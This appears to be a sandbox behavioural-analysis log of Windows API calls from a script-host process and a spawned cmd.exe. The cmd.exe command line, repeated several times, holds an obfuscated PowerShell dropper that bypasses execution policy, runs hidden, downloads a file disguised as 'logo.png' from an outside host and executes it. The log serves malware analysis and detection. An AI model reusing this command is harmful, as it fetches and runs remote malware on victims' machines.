	[0080.033] QueryInterface () returned 0x80004002
	[0080.033] QueryInterface () returned 0x80004002
	[0080.033] QueryInterface () returned 0x0
	[0080.033] Release () returned 0x1
	[0080.033] realloc (_Block=0x382b40, _Size=0x140) returned 0x344f90
	[0080.035] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0080.035] CObjectContext::Release () returned 0x1
	[0080.035] GetTickCount () returned 0x24ae4
	[0080.037] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0080.037] CObjectContext::Release () returned 0x1
	[0080.037] GetTickCount () returned 0x24ae4
	[0080.266] ??2@YAPEAX_K@Z () returned 0x3e6230
	[0080.268] ??2@YAPEAX_K@Z () returned 0x3e64d0
	[0080.269] ??2@YAPEAX_K@Z () returned 0x3e6770
	[0080.270] ??2@YAPEAX_K@Z () returned 0x3f7340
	[0080.271] ??2@YAPEAX_K@Z () returned 0x3f7b20
	[0080.272] ??2@YAPEAX_K@Z () returned 0x3f8300
	[0080.273] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc31b8 | out: ppv=0xc31b8*=0x1df420) returned 0x0
	[0080.273] free (_Block=0x3faa10) 
	[0080.273] ??3@YAXPEAX@Z () returned 0x6f00a4006c0001
	[0080.273] ??3@YAXPEAX@Z () returned 0x6600500001
	[0080.273] free (_Block=0x3d9500) 
	[0080.273] free (_Block=0x417870) 
	[0080.273] ??3@YAXPEAX@Z () returned 0x67002e0001
	[0080.273] ??3@YAXPEAX@Z () returned 0x1
	[0080.273] free (_Block=0x3fa8a0) 
	[0080.273] ??3@YAXPEAX@Z () returned 0x6f00a500680001
	[0080.273] ??3@YAXPEAX@Z () returned 0x67003e0001
	[0080.274] free (_Block=0x3d92c0) 
	[0080.274] free (_Block=0x416770) 
	[0080.274] ??3@YAXPEAX@Z () returned 0x1
	[0080.274] ??3@YAXPEAX@Z () returned 0x101030f01d00001
	[0080.274] free (_Block=0x3fa730) 
	[0080.274] ??3@YAXPEAX@Z () returned 0x6f00a600660001
	[0080.274] ??3@YAXPEAX@Z () returned 0x6800380001
	[0080.274] free (_Block=0x3d9080) 
	[0080.274] free (_Block=0x3dbce0) 
	[0080.274] ??3@YAXPEAX@Z () returned 0x901f10001
	[0080.274] ??3@YAXPEAX@Z () returned 0x101031001520001
	[0080.274] free (_Block=0x3fa5c0) 
	[0080.274] ??3@YAXPEAX@Z () returned 0x6f00a700640001
	[0080.274] ??3@YAXPEAX@Z () returned 0x6900320001
	[0080.274] free (_Block=0x3d8e40) 
	[0080.274] free (_Block=0x3db8a0) 
	[0080.274] ??3@YAXPEAX@Z () returned 0xa01c50001
	[0080.274] ??3@YAXPEAX@Z () returned 0x1
	[0080.274] free (_Block=0x3fa450) 
	[0080.274] ??3@YAXPEAX@Z () returned 0x6f00a800620001
	[0080.274] ??3@YAXPEAX@Z () returned 0x6a002c0001
	[0080.274] free (_Block=0x3d8c00) 
	[0080.274] free (_Block=0x3db460) 
	[0080.274] ??3@YAXPEAX@Z () returned 0xb01990001
	[0080.275] ??3@YAXPEAX@Z () returned 0xb01ec0001
	[0080.275] free (_Block=0x3fa2e0) 
	[0080.275] ??3@YAXPEAX@Z () returned 0x6f00a900600001
	[0080.275] ??3@YAXPEAX@Z () returned 0x6b00260001
	[0080.275] free (_Block=0x3d89c0) 
	[0080.275] free (_Block=0x3db020) 
	[0080.275] ??3@YAXPEAX@Z () returned 0xc016d0001
	[0080.275] ??3@YAXPEAX@Z () returned 0xc01c20001
	[0080.275] free (_Block=0x3fa170) 
	[0080.275] ??3@YAXPEAX@Z () returned 0x6f00aa005e0001
	[0080.275] ??3@YAXPEAX@Z () returned 0x6c00200001
	[0080.275] free (_Block=0x3d8780) 
	[0080.275] free (_Block=0x3dabe0) 
	[0080.275] ??3@YAXPEAX@Z () returned 0xd012b0001
	[0080.275] ??3@YAXPEAX@Z () returned 0xd01980001
	[0080.275] free (_Block=0x3fa000) 
	[0080.275] ??3@YAXPEAX@Z () returned 0x6f00ab005c0001
	[0080.275] ??3@YAXPEAX@Z () returned 0x6d001a0001
	[0080.275] free (_Block=0x3d8540) 
	[0080.275] free (_Block=0x3da7a0) 
	[0080.275] ??3@YAXPEAX@Z () returned 0x1
	[0080.276] ??3@YAXPEAX@Z () returned 0xe016e0001
	[0080.276] free (_Block=0x3f9e90) 
	[0080.276] ??3@YAXPEAX@Z () returned 0x6f00ac005a0001
	[0080.276] ??3@YAXPEAX@Z () returned 0x6e00140001
	[0080.276] free (_Block=0x3d8300) 
	[0080.276] free (_Block=0x3da360) 
	[0080.276] ??3@YAXPEAX@Z () returned 0xf01af0001
	[0080.276] ??3@YAXPEAX@Z () returned 0xf00fe0001
	[0080.276] free (_Block=0x3f9d20) 
	[0080.276] ??3@YAXPEAX@Z () returned 0x6f00ad00580001
	[0080.276] ??3@YAXPEAX@Z () returned 0x6f000e0001
	[0080.276] free (_Block=0x3c7a20) 
	[0080.276] free (_Block=0x3c5210) 
	[0080.276] ??3@YAXPEAX@Z () returned 0x1000ff0001
	[0080.276] ??3@YAXPEAX@Z () returned 0x1000800001
	[0080.276] IUnknown:Release (This=0x1df420) returned 0x1
	[0080.276] GetTickCount () returned 0x24bce
	[0080.277] ??2@YAPEAX_K@Z () returned 0x3e50b0
	[0080.278] ??2@YAPEAX_K@Z () returned 0x3e6230
	[0080.279] ??2@YAPEAX_K@Z () returned 0x3f7340
	[0080.280] ??2@YAPEAX_K@Z () returned 0x42d7a0
	[0080.281] ??2@YAPEAX_K@Z () returned 0x42da40
	[0080.282] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x1b0718
	[0080.282] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x1b0b6c
	[0080.282] LockResource (hResData=0x1b0b6c) returned 0x1b0b6c
	[0080.282] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x86
	[0080.283] FreeResource (hResData=0x1b0b6c) returned 0
	[0080.283] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0080.283] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0080.283] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0080.283] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0080.284] FreeResource (hResData=0x1b1c74) returned 0
	[0080.284] bsearch (_Key=0xb3478, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0080.284] SysStringLen (param_1="Microsoft JScript runtime error") returned 0x1f
	[0080.284] SysStringLen (param_1="Out of stack space") returned 0x12
	[0081.145] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefec0a1b0, dwCookie=0x100) returned 0x0
	[0081.145] IUnknown:Release (This=0x1df420) returned 0x1
	[0081.145] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.145] IUnknown:Release (This=0x1df420) returned 0x0
	[0081.145] ISystemDebugEventFire:EndSession (This=0x1f75b0) returned 0x0
	[0081.145] IUnknown:Release (This=0x1f75b0) returned 0x1
	[0081.145] GetUserDefaultLCID () returned 0x409
	[0081.145] GetACP () returned 0x4e4
	[0081.145] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.145] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.145] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.145] free (_Block=0x36d860) 
	[0081.147] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.147] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.147] IUnknown:Release (This=0x1f75b0) returned 0x0
	[0081.147] free (_Block=0x4ff640) 
	[0081.147] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.147] SendMessageA (hWnd=0x40230, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0081.149] SendMessageA (hWnd=0x40230, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0081.149] PostMessageA (hWnd=0x40230, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0081.151] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x19faf0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0081.151] CloseHandle (hObject=0xd4) returned 1
	[0081.151] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.151] IUnknown:Release (This=0x1ee5f0) returned 0x0
	[0081.151] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.151] IUnknown:Release (This=0x1ee6a0) returned 0x0
	[0081.151] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.151] IUnknown:Release (This=0x1ee750) returned 0x0
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.152] IUnknown:Release (This=0x1ee540) returned 0x0
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.152] GetProcessHeap () returned 0x1c0000
	[0081.152] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22ae20 | out: hHeap=0x1c0000) returned 1
	[0081.152] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.153] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19fb20 | out: lplpMessageFilter=0x19fb20*=0x4f5f80) returned 0x0
	[0081.153] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.153] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.153] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.153] CoUninitialize () 
	[0081.153] DllCanUnloadNow () returned 0x0
	[0081.153] DllCanUnloadNow () returned 0x0
	[0081.154] DllCanUnloadNow () returned 0x1
	[0081.155] free (_Block=0x3e1860) 
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.156] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.157] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.157] ??2@YAPEAX_K@Z () returned 0x353fe0
	[0081.157] ??3@YAXPEAX@Z () returned 0x45311b01
	[0081.157] ??3@YAXPEAX@Z () returned 0x18400050001
	[0081.157] ??3@YAXPEAX@Z () returned 0x45311b01

Thread:
	id = 169
	os_tid = 0x828


Thread:
	id = 170
	os_tid = 0x614

	[0077.891] GetClassInfoA (in: hInstance=0xff540000, lpClassName="WSH-Timer", lpWndClass=0x276fbf0 | out: lpWndClass=0x276fbf0) returned 0
	[0077.892] RegisterClassA (lpWndClass=0x276fbf0) returned 0x9006ac138
	[0077.892] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff540000, lpParam=0x4f5a60) returned 0x40230
	[0077.893] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x0
	[0077.893] NtdllDefWindowProc_A (hWnd=0x40230, Msg=0x24, wParam=0x0, lParam=0x276f5e0) returned 0x0
	[0077.893] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x0
	[0077.893] SetWindowLongPtrA (hWnd=0x40230, nIndex=-21, dwNewLong=0x4f5a60) returned 0x0
	[0077.893] NtdllDefWindowProc_A (hWnd=0x40230, Msg=0x81, wParam=0x0, lParam=0x276f5a0) returned 0x1
	[0077.894] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x4f5a60
	[0077.894] NtdllDefWindowProc_A (hWnd=0x40230, Msg=0x83, wParam=0x0, lParam=0x276f600) returned 0x0
	[0077.896] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x4f5a60
	[0077.896] NtdllDefWindowProc_A (hWnd=0x40230, Msg=0x1, wParam=0x0, lParam=0x276f5a0) returned 0x0
	[0077.896] SetEvent (hEvent=0xcc) returned 1
	[0077.931] GetMessageA (in: lpMsg=0x276fbc0, hWnd=0x40230, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x276fbc0) returned 0
	[0081.148] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x4f5a60
	[0081.149] GetWindowLongPtrA (hWnd=0x40230, nIndex=-21) returned 0x4f5a60

Thread:
	id = 171
	os_tid = 0x358


Thread:
	id = 172
	os_tid = 0x610


Thread:
	id = 173
	os_tid = 0x878


Thread:
	id = 175
	os_tid = 0xa1c


Thread:
	id = 176
	os_tid = 0x178


Thread:
	id = 179
	os_tid = 0xc4


Thread:
	id = 185
	os_tid = 0xbec


Process:
	id = "20"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x47570000"
	os_pid = "0x41c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "17"
	os_parent_pid = "0xbb0"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 168
	os_tid = 0x8f0

	[0078.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8b0 | out: lpSystemTimeAsFileTime=0x18f8b0*(dwLowDateTime=0xa76c34d0, dwHighDateTime=0x1d543d1)) 
	[0078.891] GetCurrentProcessId () returned 0x41c
	[0078.891] GetCurrentThreadId () returned 0x8f0
	[0078.891] GetTickCount () returned 0x24662
	[0078.891] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8b8 | out: lpPerformanceCount=0x18f8b8*=20331754719) returned 1
	[0078.892] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0078.892] __set_app_type (_Type=0x1) 
	[0078.892] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0078.892] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0078.892] GetCurrentThreadId () returned 0x8f0
	[0078.892] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8f0) returned 0x3c
	[0078.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0078.893] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0078.893] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0078.893] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0078.893] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f848 | out: phkResult=0x18f848*=0x0) returned 0x2
	[0078.893] VirtualQuery (in: lpAddress=0x18f830, lpBuffer=0x18f7b0, dwLength=0x30 | out: lpBuffer=0x18f7b0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0078.893] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f7b0, dwLength=0x30 | out: lpBuffer=0x18f7b0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0078.893] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f7b0, dwLength=0x30 | out: lpBuffer=0x18f7b0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0078.893] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f7b0, dwLength=0x30 | out: lpBuffer=0x18f7b0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0078.893] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f7b0, dwLength=0x30 | out: lpBuffer=0x18f7b0*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0078.893] GetConsoleOutputCP () returned 0x1b5
	[0078.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0078.894] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0078.894] _get_osfhandle (_FileHandle=1) returned 0x7
	[0078.894] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0078.894] _get_osfhandle (_FileHandle=1) returned 0x7
	[0078.894] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0078.894] _get_osfhandle (_FileHandle=1) returned 0x7
	[0078.894] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0078.894] _get_osfhandle (_FileHandle=0) returned 0x3
	[0078.894] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0078.895] _get_osfhandle (_FileHandle=0) returned 0x3
	[0078.895] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0078.895] GetEnvironmentStringsW () returned 0x1f8f20*
	[0078.895] GetProcessHeap () returned 0x1e0000
	[0078.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xad4) returned 0x1f9a00
	[0078.895] FreeEnvironmentStringsW (penv=0x1f8f20) returned 1
	[0078.895] GetProcessHeap () returned 0x1e0000
	[0078.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x8) returned 0x1f87a0
	[0078.895] GetEnvironmentStringsW () returned 0x1f8f20*
	[0078.895] GetProcessHeap () returned 0x1e0000
	[0078.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xad4) returned 0x1fa4e0
	[0078.895] FreeEnvironmentStringsW (penv=0x1f8f20) returned 1
	[0078.895] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e708 | out: phkResult=0x18e708*=0x44) returned 0x0
	[0078.895] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x18, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.895] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x1, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x1, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x0, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x40, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x40, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x40, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.896] RegCloseKey (hKey=0x44) returned 0x0
	[0078.896] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e708 | out: phkResult=0x18e708*=0x44) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x40, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x1, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x1, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x0, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x9, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x4, lpData=0x18e720*=0x9, lpcbData=0x18e704*=0x4) returned 0x0
	[0078.896] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e700, lpData=0x18e720, lpcbData=0x18e704*=0x1000 | out: lpType=0x18e700*=0x0, lpData=0x18e720*=0x9, lpcbData=0x18e704*=0x1000) returned 0x2
	[0078.896] RegCloseKey (hKey=0x44) returned 0x0
	[0078.896] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e5d
	[0078.896] srand (_Seed=0x5d3b2e5d) 
	[0078.896] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0078.896] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0078.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0078.897] GetProcessHeap () returned 0x1e0000
	[0078.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x218) returned 0x1f8f20
	[0078.897] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0078.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0078.897] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0078.897] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0078.897] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0078.897] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0078.897] GetProcessHeap () returned 0x1e0000
	[0078.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f9a00 | out: hHeap=0x1e0000) returned 1
	[0078.897] GetEnvironmentStringsW () returned 0x1f9140*
	[0078.897] GetProcessHeap () returned 0x1e0000
	[0078.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xaec) returned 0x1fbad0
	[0078.898] FreeEnvironmentStringsW (penv=0x1f9140) returned 1
	[0078.898] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0078.898] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0078.898] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0078.898] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0078.898] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0078.898] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0078.898] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0078.898] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0078.898] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0078.898] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0078.898] GetProcessHeap () returned 0x1e0000
	[0078.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x48) returned 0x1f8d80
